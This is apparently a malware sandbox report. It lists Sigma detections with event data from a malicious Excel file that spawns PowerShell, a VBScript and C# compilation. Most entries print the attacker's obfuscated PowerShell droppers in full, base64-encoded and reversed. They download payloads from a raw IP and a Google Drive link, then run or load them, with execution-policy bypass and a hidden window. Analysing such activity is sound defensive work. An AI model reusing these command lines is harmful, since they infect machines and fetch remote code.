              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline", ProcessId: 3940, ProcessName: csc.exe
              Sigma detected: Excel Network Connections
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3360, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3740, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS
              Sigma detected: Suspicious Office Outbound Connections
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3360, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/22
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/22
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3740, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS" , ProcessId: 4044, ProcessName: wscript.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3740, TargetFilename: C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3360, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKT